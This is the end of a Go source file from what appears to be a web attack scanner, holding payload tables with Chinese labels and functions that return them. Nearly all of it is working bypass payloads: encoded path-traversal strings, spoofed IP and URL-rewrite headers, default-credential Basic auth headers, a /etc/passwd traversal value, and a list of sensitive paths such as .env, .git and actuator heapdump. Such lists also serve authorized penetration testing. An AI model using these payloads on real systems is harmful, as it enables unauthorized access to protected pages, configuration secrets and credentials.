	{Raw: `SECURITY:403BYPASS /%2e/admin`, Description: "安全-403绕过/%2e/admin", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS /admin%23`, Description: "安全-403绕过%23", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS /admin%3f`, Description: "安全-403绕过%3f", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS /admin%09`, Description: "安全-403绕过TAB", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS /admin%20`, Description: "安全-403绕过空格", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS /admin%0d%0a`, Description: "安全-403绕过CRLF", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS /admin%5c`, Description: "安全-403绕过反斜杠", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS /admin.json`, Description: "安全-403绕过.json", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS /admin.html`, Description: "安全-403绕过.html", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS /admin.xml`, Description: "安全-403绕过.xml", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS /admin.bak`, Description: "安全-403绕过.bak", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS /admin.old`, Description: "安全-403绕过.old", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS /admin~`, Description: "安全-403绕过~", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS //admin//`, Description: "安全-403绕过双斜杠包围", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS /./admin/./`, Description: "安全-403绕过././/", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS /.../admin`, Description: "安全-403绕过三点", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS /..../admin`, Description: "安全-403绕过四点", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS /Admin`, Description: "安全-403绕过首字母大写", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS %u002e%u002e`, Description: "安全-WAF绕过%u002e%u002e", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS %c0%ae%c0%ae`, Description: "安全-WAF绕过%c0%ae%c0%ae", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS /%252e%252e/`, Description: "安全-WAF绕过双重URL ..", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS %25%32%66`, Description: "安全-WAF绕过三重URL /", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS %255c`, Description: "安全-WAF绕过双重URL反斜杠", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS ..%5c`, Description: "安全-WAF绕过..反斜杠", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS ..%c0%af`, Description: "安全-WAF绕过..%c0%af", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS .%00.`, Description: "安全-WAF绕过Null点", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS ..%252f`, Description: "安全-WAF绕过..%252f", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS %ef%bc%8f`, Description: "安全-WAF绕过全角斜杠", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS %u2216`, Description: "安全-WAF绕过%u2216", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS ..\`, Description: "安全-WAF绕过反斜杠", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS ..;/`, Description: "安全-WAF绕过分号斜杠", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS ..%3b/`, Description: "安全-WAF绕过URL分号斜杠", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS /?param=../`, Description: "安全-WAF绕过参数../", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS /#../`, Description: "安全-WAF绕过井号../", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS ..;a=../`, Description: "安全-WAF绕过矩阵参数", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS ..%0d/`, Description: "安全-WAF绕过回车截断", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS ..%0a/`, Description: "安全-WAF绕过换行截断", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS ..%0d%0a/`, Description: "安全-WAF绕过CRLF截断", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS X-Forwarded-For:127.0.0.1`, Description: "安全-403绕过XFF", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS X-Real-IP:127.0.0.1`, Description: "安全-403绕过X-Real-IP", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS X-Originating-IP:127.0.0.1`, Description: "安全-403绕过X-Originating-IP", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS X-Remote-IP:127.0.0.1`, Description: "安全-403绕过X-Remote-IP", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS X-Client-IP:127.0.0.1`, Description: "安全-403绕过X-Client-IP", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS Client-IP:127.0.0.1`, Description: "安全-403绕过Client-IP", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS X-Host:127.0.0.1`, Description: "安全-403绕过X-Host", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS X-Forwarded-Host:127.0.0.1`, Description: "安全-403绕过XFH", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS True-Client-IP:127.0.0.1`, Description: "安全-403绕过True-Client-IP", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS CF-Connecting-IP:127.0.0.1`, Description: "安全-403绕过CF-Connecting-IP", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS X-Forwarded-For:127.0.0.1`, Description: "安全-403绕过XFF local", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS X-Forwarded-For:localhost`, Description: "安全-403绕过XFF localhost", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS X-Forwarded-For:[::1]`, Description: "安全-403绕过XFF IPv6", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS Host:localhost`, Description: "安全-403绕过Host localhost", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS Host:127.0.0.1`, Description: "安全-403绕过Host 127.0.0.1", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS Referer:https://localhost/`, Description: "安全-403绕过Referer localhost", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS Referer:https://admin.example.com/`, Description: "安全-403绕过Referer admin", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS Origin:https://localhost/`, Description: "安全-403绕过Origin localhost", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS Origin:null`, Description: "安全-403绕过Origin null", BypassType: DirBypassHeader},
	{Raw: `SECURITY:401BYPASS Authorization:Basic YWRtaW46YWRtaW4=`, Description: "安全-401绕过Basic admin", BypassType: DirBypassHeader},
	{Raw: `SECURITY:401BYPASS Authorization:Basic dGVzdDp0ZXN0`, Description: "安全-401绕过Basic test", BypassType: DirBypassHeader},
	{Raw: `SECURITY:401BYPASS Authorization:Basic Z3Vlc3Q6Z3Vlc3Q=`, Description: "安全-401绕过Basic guest", BypassType: DirBypassHeader},
	{Raw: `SECURITY:401BYPASS Authorization:Basic cm9vdDpyb290`, Description: "安全-401绕过Basic root", BypassType: DirBypassHeader},
	{Raw: `SECURITY:401BYPASS Authorization:Basic dXNlcjp1c2Vy`, Description: "安全-401绕过Basic user", BypassType: DirBypassHeader},
	{Raw: `SECURITY:401BYPASS Authorization:Basic YWRtaW46cGFzc3dvcmQ=`, Description: "安全-401绕过Basic admin:password", BypassType: DirBypassHeader},
	{Raw: `SECURITY:401BYPASS Authorization:Basic YWRtaW46`, Description: "安全-401绕过Basic admin空密码", BypassType: DirBypassHeader},
	{Raw: `SECURITY:401BYPASS Authorization:Bearer null`, Description: "安全-401绕过Bearer null", BypassType: DirBypassHeader},
	{Raw: `SECURITY:401BYPASS Authorization:Bearer admin`, Description: "安全-401绕过Bearer admin", BypassType: DirBypassHeader},
	{Raw: `SECURITY:401BYPASS Authorization:NTLM TlRMTVNTUAAB`, Description: "安全-401绕过NTLM", BypassType: DirBypassHeader},
	{Raw: `SECURITY:401BYPASS Authorization:Negotiate TlRMTVNTUAAB`, Description: "安全-401绕过Negotiate", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS Content-Type:text/xml`, Description: "安全-WAF绕过Content-Type XML", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS Content-Type:application/x-www-form-urlencoded`, Description: "安全-WAF绕过Content-Type form", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS Content-Type:multipart/form-data`, Description: "安全-WAF绕过Content-Type multipart", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS Content-Type:text/plain`, Description: "安全-WAF绕过Content-Type text", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS Transfer-Encoding:chunked`, Description: "安全-WAF绕过Transfer-Encoding chunked", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS Content-Encoding:gzip`, Description: "安全-WAF绕过Content-Encoding gzip", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS HTTP/1.0`, Description: "安全-WAF绕过HTTP/1.0", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS HTTP/0.9`, Description: "安全-WAF绕过HTTP/0.9", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS Connection:keep-alive,close`, Description: "安全-WAF绕过Connection双重", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS Range:bytes=0-0`, Description: "安全-WAF绕过Range", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS If-None-Match:*`, Description: "安全-WAF绕过If-None-Match", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS If-Modified-Since:Sat,29Oct202200:00:00GMT`, Description: "安全-WAF绕过If-Modified-Since", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS Upgrade-Insecure-Requests:1`, Description: "安全-WAF绕过Upgrade", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS X-Requested-With:XMLHttpRequest`, Description: "安全-WAF绕过X-Requested-With", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS Via:1.1localhost`, Description: "安全-WAF绕过Via", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS Max-Forwards:0`, Description: "安全-WAF绕过Max-Forwards", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS X-Original-URL:/admin`, Description: "安全-WAF绕过X-Original-URL", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS X-Rewrite-URL:/admin`, Description: "安全-WAF绕过X-Rewrite-URL", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS X-Forwarded-Path:/admin`, Description: "安全-WAF绕过X-Forwarded-Path", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS X-HTTP-Method-Override:GET`, Description: "安全-WAF绕过X-HTTP-Method-Override", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS X-Method-Override:GET`, Description: "安全-WAF绕过X-Method-Override", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS X-Forwarded-Method:GET`, Description: "安全-WAF绕过X-Forwarded-Method", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS Accept:../../../../etc/passwd{{`, Description: "安全-WAF绕过Accept路径遍历", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS Pragma:no-cache`, Description: "安全-WAF绕过Pragma", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS Cache-Control:no-cache`, Description: "安全-WAF绕过Cache-Control", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS X-Forwarded-Scheme:http`, Description: "安全-WAF绕过X-Forwarded-Scheme", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS X-Forwarded-Port:80`, Description: "安全-WAF绕过X-Forwarded-Port", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS X-Forwarded-SSL:off`, Description: "安全-WAF绕过X-Forwarded-SSL", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS Front-End-Https:off`, Description: "安全-WAF绕过Front-End-Https", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS X-Forwarded-Proto:http`, Description: "安全-WAF绕过X-Forwarded-Proto", BypassType: DirBypassHeader},
}

func DirUserAgentBypassPayloads() []Payload     { return dirUserAgentBypass }
func DirHeaderBypassPayloads() []Payload         { return dirHeaderBypass }
func DirEncodingBypassPayloads() []Payload       { return dirEncodingBypass }
func DirCaseBypassPayloads() []Payload           { return dirCaseBypass }
func DirRateLimitBypassPayloads() []Payload      { return dirRateLimitBypass }
func DirPathObfuscationBypassPayloads() []Payload { return dirPathObfuscationBypass }
func DirMethodBypassPayloads() []Payload         { return dirMethodBypass }
func DirRefererBypassPayloads() []Payload        { return dirRefererBypass }
func DirCookieBypassPayloads() []Payload         { return dirCookieBypass }
func DirParamBypassPayloads() []Payload          { return dirParamBypass }
func DirSecurityBypassPayloads() []Payload       { return dirSecurityBypass }

func DirBypassPayloads(t DirScanBypassType) []Payload {
	switch t {
	case DirBypassUserAgent:
		return dirUserAgentBypass
	case DirBypassHeader:
		return dirHeaderBypass
	case DirBypassEncoding:
		return dirEncodingBypass
	case DirBypassCase:
		return dirCaseBypass
	case DirBypassRateLimit:
		return dirRateLimitBypass
	case DirBypassPathObfuscation:
		return dirPathObfuscationBypass
	case DirBypassMethod:
		return dirMethodBypass
	case DirBypassReferer:
		return dirRefererBypass
	case DirBypassCookie:
		return dirCookieBypass
	case DirBypassParam:
		return dirParamBypass
	default:
		return dirPathObfuscationBypass
	}
}

var dirCommonPaths = []Payload{
	{Raw: `/admin`, Description: "路径-admin", BypassType: DirBypassEncoding},
	{Raw: `/administrator`, Description: "路径-administrator", BypassType: DirBypassEncoding},
	{Raw: `/wp-admin`, Description: "路径-wp-admin", BypassType: DirBypassEncoding},
	{Raw: `/wp-login.php`, Description: "路径-wp-login", BypassType: DirBypassEncoding},
	{Raw: `/wp-content`, Description: "路径-wp-content", BypassType: DirBypassEncoding},
	{Raw: `/wp-includes`, Description: "路径-wp-includes", BypassType: DirBypassEncoding},
	{Raw: `/phpmyadmin`, Description: "路径-phpmyadmin", BypassType: DirBypassEncoding},
	{Raw: `/pma`, Description: "路径-pma", BypassType: DirBypassEncoding},
	{Raw: `/mysql`, Description: "路径-mysql", BypassType: DirBypassEncoding},
	{Raw: `/myadmin`, Description: "路径-myadmin", BypassType: DirBypassEncoding},
	{Raw: `/sqladmin`, Description: "路径-sqladmin", BypassType: DirBypassEncoding},
	{Raw: `/webdb`, Description: "路径-webdb", BypassType: DirBypassEncoding},
	{Raw: `/login`, Description: "路径-login", BypassType: DirBypassEncoding},
	{Raw: `/signin`, Description: "路径-signin", BypassType: DirBypassEncoding},
	{Raw: `/signup`, Description: "路径-signup", BypassType: DirBypassEncoding},
	{Raw: `/register`, Description: "路径-register", BypassType: DirBypassEncoding},
	{Raw: `/forgot-password`, Description: "路径-forgot-password", BypassType: DirBypassEncoding},
	{Raw: `/reset-password`, Description: "路径-reset-password", BypassType: DirBypassEncoding},
	{Raw: `/dashboard`, Description: "路径-dashboard", BypassType: DirBypassEncoding},
	{Raw: `/panel`, Description: "路径-panel", BypassType: DirBypassEncoding},
	{Raw: `/cp`, Description: "路径-cp", BypassType: DirBypassEncoding},
	{Raw: `/cpanel`, Description: "路径-cpanel", BypassType: DirBypassEncoding},
	{Raw: `/webmail`, Description: "路径-webmail", BypassType: DirBypassEncoding},
	{Raw: `/mail`, Description: "路径-mail", BypassType: DirBypassEncoding},
	{Raw: `/webdisk`, Description: "路径-webdisk", BypassType: DirBypassEncoding},
	{Raw: `/config`, Description: "路径-config", BypassType: DirBypassEncoding},
	{Raw: `/settings`, Description: "路径-settings", BypassType: DirBypassEncoding},
	{Raw: `/setup`, Description: "路径-setup", BypassType: DirBypassEncoding},
	{Raw: `/install`, Description: "路径-install", BypassType: DirBypassEncoding},
	{Raw: `/backup`, Description: "路径-backup", BypassType: DirBypassEncoding},
	{Raw: `/uploads`, Description: "路径-uploads", BypassType: DirBypassEncoding},
	{Raw: `/files`, Description: "路径-files", BypassType: DirBypassEncoding},
	{Raw: `/download`, Description: "路径-download", BypassType: DirBypassEncoding},
	{Raw: `/downloads`, Description: "路径-downloads", BypassType: DirBypassEncoding},
	{Raw: `/images`, Description: "路径-images", BypassType: DirBypassEncoding},
	{Raw: `/img`, Description: "路径-img", BypassType: DirBypassEncoding},
	{Raw: `/css`, Description: "路径-css", BypassType: DirBypassEncoding},
	{Raw: `/js`, Description: "路径-js", BypassType: DirBypassEncoding},
	{Raw: `/assets`, Description: "路径-assets", BypassType: DirBypassEncoding},
	{Raw: `/static`, Description: "路径-static", BypassType: DirBypassEncoding},
	{Raw: `/public`, Description: "路径-public", BypassType: DirBypassEncoding},
	{Raw: `/templates`, Description: "路径-templates", BypassType: DirBypassEncoding},
	{Raw: `/cgi-bin`, Description: "路径-cgi-bin", BypassType: DirBypassEncoding},
	{Raw: `/test`, Description: "路径-test", BypassType: DirBypassEncoding},
	{Raw: `/dev`, Description: "路径-dev", BypassType: DirBypassEncoding},
	{Raw: `/staging`, Description: "路径-staging", BypassType: DirBypassEncoding},
	{Raw: `/beta`, Description: "路径-beta", BypassType: DirBypassEncoding},
	{Raw: `/demo`, Description: "路径-demo", BypassType: DirBypassEncoding},
	{Raw: `/tmp`, Description: "路径-tmp", BypassType: DirBypassEncoding},
	{Raw: `/temp`, Description: "路径-temp", BypassType: DirBypassEncoding},
	{Raw: `/logs`, Description: "路径-logs", BypassType: DirBypassEncoding},
	{Raw: `/log`, Description: "路径-log", BypassType: DirBypassEncoding},
	{Raw: `/error`, Description: "路径-error", BypassType: DirBypassEncoding},
	{Raw: `/errors`, Description: "路径-errors", BypassType: DirBypassEncoding},
	{Raw: `/api`, Description: "路径-api", BypassType: DirBypassEncoding},
	{Raw: `/rest`, Description: "路径-rest", BypassType: DirBypassEncoding},
	{Raw: `/soap`, Description: "路径-soap", BypassType: DirBypassEncoding},
	{Raw: `/graphql`, Description: "路径-graphql", BypassType: DirBypassEncoding},
	{Raw: `/swagger`, Description: "路径-swagger", BypassType: DirBypassEncoding},
	{Raw: `/openapi`, Description: "路径-openapi", BypassType: DirBypassEncoding},
	{Raw: `/docs`, Description: "路径-docs", BypassType: DirBypassEncoding},
	{Raw: `/doc`, Description: "路径-doc", BypassType: DirBypassEncoding},
	{Raw: `/help`, Description: "路径-help", BypassType: DirBypassEncoding},
	{Raw: `/about`, Description: "路径-about", BypassType: DirBypassEncoding},
	{Raw: `/contact`, Description: "路径-contact", BypassType: DirBypassEncoding},
	{Raw: `/search`, Description: "路径-search", BypassType: DirBypassEncoding},
	{Raw: `/sitemap`, Description: "路径-sitemap", BypassType: DirBypassEncoding},
	{Raw: `/robots.txt`, Description: "路径-robots.txt", BypassType: DirBypassEncoding},
	{Raw: `/favicon.ico`, Description: "路径-favicon.ico", BypassType: DirBypassEncoding},
	{Raw: `/crossdomain.xml`, Description: "路径-crossdomain.xml", BypassType: DirBypassEncoding},
	{Raw: `/clientaccesspolicy.xml`, Description: "路径-clientaccesspolicy.xml", BypassType: DirBypassEncoding},
	{Raw: `/.htaccess`, Description: "路径-.htaccess", BypassType: DirBypassEncoding},
	{Raw: `/.htpasswd`, Description: "路径-.htpasswd", BypassType: DirBypassEncoding},
	{Raw: `/.env`, Description: "路径-.env", BypassType: DirBypassEncoding},
	{Raw: `/.git`, Description: "路径-.git", BypassType: DirBypassEncoding},
	{Raw: `/.svn`, Description: "路径-.svn", BypassType: DirBypassEncoding},
	{Raw: `/.DS_Store`, Description: "路径-.DS_Store", BypassType: DirBypassEncoding},
	{Raw: `/WEB-INF/web.xml`, Description: "路径-web.xml", BypassType: DirBypassEncoding},
	{Raw: `/META-INF`, Description: "路径-META-INF", BypassType: DirBypassEncoding},
	{Raw: `/server-status`, Description: "路径-server-status", BypassType: DirBypassEncoding},
	{Raw: `/server-info`, Description: "路径-server-info", BypassType: DirBypassEncoding},
	{Raw: `/phpinfo.php`, Description: "路径-phpinfo", BypassType: DirBypassEncoding},
	{Raw: `/info.php`, Description: "路径-info.php", BypassType: DirBypassEncoding},
	{Raw: `/test.php`, Description: "路径-test.php", BypassType: DirBypassEncoding},
	{Raw: `/trace.axd`, Description: "路径-trace.axd", BypassType: DirBypassEncoding},
	{Raw: `/elmah.axd`, Description: "路径-elmah.axd", BypassType: DirBypassEncoding},
	{Raw: `/actuator`, Description: "路径-actuator", BypassType: DirBypassEncoding},
	{Raw: `/actuator/health`, Description: "路径-actuator/health", BypassType: DirBypassEncoding},
	{Raw: `/actuator/env`, Description: "路径-actuator/env", BypassType: DirBypassEncoding},
	{Raw: `/actuator/mappings`, Description: "路径-actuator/mappings", BypassType: DirBypassEncoding},
	{Raw: `/actuator/beans`, Description: "路径-actuator/beans", BypassType: DirBypassEncoding},
	{Raw: `/actuator/heapdump`, Description: "路径-actuator/heapdump", BypassType: DirBypassEncoding},
	{Raw: `/actuator/loggers`, Description: "路径-actuator/loggers", BypassType: DirBypassEncoding},
	{Raw: `/jmx-console`, Description: "路径-jmx-console", BypassType: DirBypassEncoding},
	{Raw: `/web-console`, Description: "路径-web-console", BypassType: DirBypassEncoding},
	{Raw: `/jmxws`, Description: "路径-jmxws", BypassType: DirBypassEncoding},
	{Raw: `/invoker/JMXInvokerServlet`, Description: "路径-JMXInvokerServlet", BypassType: DirBypassEncoding},
	{Raw: `/druid`, Description: "路径-druid", BypassType: DirBypassEncoding},
	{Raw: `/debug`, Description: "路径-debug", BypassType: DirBypassEncoding},
	{Raw: `/console`, Description: "路径-console", BypassType: DirBypassEncoding},
	{Raw: `/solr`, Description: "路径-solr", BypassType: DirBypassEncoding},
	{Raw: `/solr/admin`, Description: "路径-solr/admin", BypassType: DirBypassEncoding},
	{Raw: `/jenkins`, Description: "路径-jenkins", BypassType: DirBypassEncoding},
	{Raw: `/jenkins/script`, Description: "路径-jenkins/script", BypassType: DirBypassEncoding},
	{Raw: `/gitlab`, Description: "路径-gitlab", BypassType: DirBypassEncoding},
	{Raw: `/jira`, Description: "路径-jira", BypassType: DirBypassEncoding},
	{Raw: `/confluence`, Description: "路径-confluence", BypassType: DirBypassEncoding},
	{Raw: `/grafana`, Description: "路径-grafana", BypassType: DirBypassEncoding},
	{Raw: `/kibana`, Description: "路径-kibana", BypassType: DirBypassEncoding},
	{Raw: `/prometheus`, Description: "路径-prometheus", BypassType: DirBypassEncoding},
	{Raw: `/prometheus/metrics`, Description: "路径-prometheus/metrics", BypassType: DirBypassEncoding},
	{Raw: `/metrics`, Description: "路径-metrics", BypassType: DirBypassEncoding},
	{Raw: `/api`, Description: "路径-api", BypassType: DirBypassEncoding},
	{Raw: `/api/v1`, Description: "路径-api/v1", BypassType: DirBypassEncoding},
	{Raw: `/api/v2`, Description: "路径-api/v2", BypassType: DirBypassEncoding},
	{Raw: `/swagger`, Description: "路径-swagger", BypassType: DirBypassEncoding},
	{Raw: `/swagger-ui.html`, Description: "路径-swagger-ui.html", BypassType: DirBypassEncoding},
	{Raw: `/swagger-resources`, Description: "路径-swagger-resources", BypassType: DirBypassEncoding},
	{Raw: `/api-docs`, Description: "路径-api-docs", BypassType: DirBypassEncoding},
	{Raw: `/v2/api-docs`, Description: "路径-v2/api-docs", BypassType: DirBypassEncoding},
	{Raw: `/v3/api-docs`, Description: "路径-v3/api-docs", BypassType: DirBypassEncoding},
	{Raw: `/graphql`, Description: "路径-graphql", BypassType: DirBypassEncoding},
	{Raw: `/graphiql`, Description: "路径-graphiql", BypassType: DirBypassEncoding},
	{Raw: `/vendor`, Description: "路径-vendor", BypassType: DirBypassEncoding},
	{Raw: `/node_modules`, Description: "路径-node_modules", BypassType: DirBypassEncoding},
	{Raw: `/composer.json`, Description: "路径-composer.json", BypassType: DirBypassEncoding},
	{Raw: `/composer.lock`, Description: "路径-composer.lock", BypassType: DirBypassEncoding},
	{Raw: `/Gemfile`, Description: "路径-Gemfile", BypassType: DirBypassEncoding},
	{Raw: `/Gemfile.lock`, Description: "路径-Gemfile.lock", BypassType: DirBypassEncoding},
	{Raw: `/package.json`, Description: "路径-package.json", BypassType: DirBypassEncoding},
	{Raw: `/package-lock.json`, Description: "路径-package-lock.json", BypassType: DirBypassEncoding},
	{Raw: `/yarn.lock`, Description: "路径-yarn.lock", BypassType: DirBypassEncoding},
	{Raw: `/Dockerfile`, Description: "路径-Dockerfile", BypassType: DirBypassEncoding},
	{Raw: `/docker-compose.yml`, Description: "路径-docker-compose.yml", BypassType: DirBypassEncoding},
	{Raw: `/.drone.yml`, Description: "路径-.drone.yml", BypassType: DirBypassEncoding},
	{Raw: `/nginx.conf`, Description: "路径-nginx.conf", BypassType: DirBypassEncoding},
	{Raw: `/nginx/status`, Description: "路径-nginx/status", BypassType: DirBypassEncoding},
	{Raw: `/stub_status`, Description: "路径-stub_status", BypassType: DirBypassEncoding},
	{Raw: `/status`, Description: "路径-status", BypassType: DirBypassEncoding},
	{Raw: `/health`, Description: "路径-health", BypassType: DirBypassEncoding},
	{Raw: `/healthz`, Description: "路径-healthz", BypassType: DirBypassEncoding},
	{Raw: `/livez`, Description: "路径-livez", BypassType: DirBypassEncoding},
	{Raw: `/readyz`, Description: "路径-readyz", BypassType: DirBypassEncoding},
	{Raw: `/version`, Description: "路径-version", BypassType: DirBypassEncoding},
	{Raw: `/info`, Description: "路径-info", BypassType: DirBypassEncoding},
	{Raw: `/stats`, Description: "路径-stats", BypassType: DirBypassEncoding},
	{Raw: `/monitoring`, Description: "路径-monitoring", BypassType: DirBypassEncoding},
	{Raw: `/monitor`, Description: "路径-monitor", BypassType: DirBypassEncoding},
	{Raw: `/dashboard`, Description: "路径-dashboard", BypassType: DirBypassEncoding},
}

func DirCommonPathsPayloads() []Payload             { return dirCommonPaths }

func DirAllBypassPayloads() []Payload {
	var all []Payload
	all = append(all, dirUserAgentBypass...)
	all = append(all, dirHeaderBypass...)
	all = append(all, dirEncodingBypass...)
	all = append(all, dirCaseBypass...)
	all = append(all, dirRateLimitBypass...)
	all = append(all, dirPathObfuscationBypass...)
	all = append(all, dirMethodBypass...)
	all = append(all, dirRefererBypass...)
	all = append(all, dirCookieBypass...)
	all = append(all, dirParamBypass...)
	all = append(all, dirSecurityBypass...)
	all = append(all, dirCommonPaths...)
	return all
}